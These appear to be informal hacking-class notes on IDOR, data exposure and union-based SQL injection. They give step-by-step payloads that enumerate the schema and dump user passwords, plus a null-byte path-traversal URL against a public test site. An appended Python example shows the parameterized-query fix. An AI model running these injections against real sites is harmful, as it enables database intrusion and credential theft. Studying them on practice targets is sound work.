LuciferAviSonicX

Session:10 union based sql injection

Aug 16th, 2017
  1. Insecure Direct Object Reference
  2. ================================
  3. Directly accessing unsecured files, configurations and settings which are neither authorized nor validated by the administrator.
  4.  
  5. home ---> www.bankudao.com/...../php?id=home
  6. user profile --> www.bankudao.com/...../php?id=user_profile
  7. profile setting ---> www.bankudao.com/...../php?id=profile_setting
  8.  
  9.  
  10. www.facebook.com/sidigudiluv/....?id=AviTathgur
  11. www.facebook.com/sidigudiluv/....?id=YashTathgur
  12.  
  13. www.facebook.com/AviTathgur
  14.  
  15.  
  16. Pages which a normal user is not allowed to visit:
  17. www.bankudalo.com/user+profile
  18. /../settings/config.html
  19.  
  20.  
  21.  
  22.  
  23. site: demo.testfire.net ---> test
  24. lucideus --> testphp.vulnweb
  25.  
  26.  
  27.  
  28. IBM appscan
  29. http://demo.testfire.net/default.aspx?content=personal_deposit.htm
  30.  
  31. http://demo.testfire.net/default.aspx?content=../default.aspx.cs%00.html
  32.  
  33.  
  34. Sensitive Data Exposure
  35. =======================
  36. Our sensitive data being shown to everyone.....
  37. 1. userid and password
  38. 2. Personal Information --> Address, Phone number, SSN
  39. 3. Banking Information --> Account Number, Card Number, Black money
  40. 4. Health Information --> insurance
  41.  
  42. With this information one could even bankrupt Donald Trump, Bill Gates, Mark Zx,xmxmxm
  43.  
  44. 1. Weak Security Configuration --> SQL Injection, intercepting
  45. 2. Weak Cryptography --> SQL Injection
  46.  
  47.  
  48. DVWA --> Damn Vulnerable Web Application
  49. ========================================
  50. A vulnerable application, insecure by default, used to test an application's security; it can be hacked very easily.
  51.  
  52.  
  53.  
  54.  
  55. 5 Phases of Hacking
  56. ===================
  57. 1. Information Gathering
  58. 2. Scanning
  59. 3. Gaining Access
  60. 4. Maintaining Access
  61. 5. Clearing Tracks
  62.  
  63.  
  64.  
  65.  
  66.  
  67.  
  68. SQL --> Structured Query Language
  69. =================================
  70. User to database interaction ----
  71. IRCTC ----> Book Tickets
  72. Login id, Password
  73. Date, Location, Destination
  74.  
  75. Select Trains from database where date="" and location="" and destination=""
  76.  
  77. It is a database programming language in which we communicate with the database in the form of a query.
  78. ticket counter ---> query ----> some command on the computer ---> enter ---> command --> database ---> answer
  79.  
  80. SQL Injection
  81. =============
  82. Queries which are harmful and can give the juicy data from the database ----> I fire some query.... the result is username and password
  83.  
  84. select username, password from IrctcDatabase;
  85.  
  86.  
  87.  
  88.  
  89. SQL Injection --> UNION BASED
  90.  
  91. 1. Find the GET method
  92. something=something
  93.  
  94. php?id=1
  95. php?cat=34
  96. php?cat=miaKhalifa
  97. php?sunny=khalifa
  98.  
  99. 2. To check the vulnerability
  100. id=1'
  101. it will give me an error... which confirms that the site is vulnerable to sql injection.
  102.  
  103. 3. Now I will check the number of columns in the database
  104. order by 1--+
  105. order by 2--+
  106. order by 3--+
  107.  
  108. 4. I will ask him to merge all the columns and show the data to me
  109. union select all 1,2--
  110.  
  111. 5. Now I will check the version and database of the website
  112. union select all 1,version()-- ----> for checking the version
  113. union select all 1,database()-- ----> for checking the database
  114.  
  115. 6. Let's call the mother of the database ---> information_schema
  116. union all select 1, table_name from information_schema.tables--
  117. we will get the list of all the tables present inside the database
  118.  
  119. 7. Now I will explore the particular table ---> users
  120. union all select 1, column_name from information_schema.columns where table_name="users"--
  121.  
  122. user_id, first_name, last_name,user,password
  123.  
  124. 8. Now I will exploit the final table of the users
  125. union all select 1, group_concat(user_id, first_name, last_name, user, password) from users--
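
Why steps 2 to 8 work, and the fix that stops them, as an added example that is not part of the original notes: the same lookup is written once with string concatenation and once with a bound parameter. Assumptions: SQLite stands in for the MySQL back end the notes target, and the products/users tables, their rows and the function names are constructed for illustration.

```python
import sqlite3

# Constructed input in the style of step 8, aimed at the sample users table below.
PAYLOAD = "1 union all select 1, password from users--"


def make_db():
    """In-memory database with constructed sample rows (table names are assumptions)."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE users (user_id INTEGER, user TEXT, password TEXT);
        INSERT INTO products VALUES (1, 'keyboard'), (2, 'mouse');
        INSERT INTO users VALUES (1, 'admin', 'constructed-secret');
        """
    )
    return db


def lookup_vulnerable(db, raw_id):
    """'Before': the id parameter is pasted into the SQL text, so the
    database parses everything inside it, including a UNION clause."""
    sql = "SELECT id, name FROM products WHERE id = " + raw_id
    return db.execute(sql).fetchall()


def lookup_parameterized(db, raw_id):
    """'After': the SQL text is fixed and the value is bound separately,
    so the whole parameter is compared to id as a single data value."""
    sql = "SELECT id, name FROM products WHERE id = ?"
    return db.execute(sql, (raw_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for fn in (lookup_vulnerable, lookup_parameterized):
        print(fn.__name__, "id=1       ->", fn(db, "1"))
        print(fn.__name__, "id=PAYLOAD ->", fn(db, PAYLOAD))
```

With the bound parameter the query shape cannot change, so the column-count probing in step 3 and the UNION in step 4 have nothing to attach to; a numeric type check on id before the query is a sensible second layer.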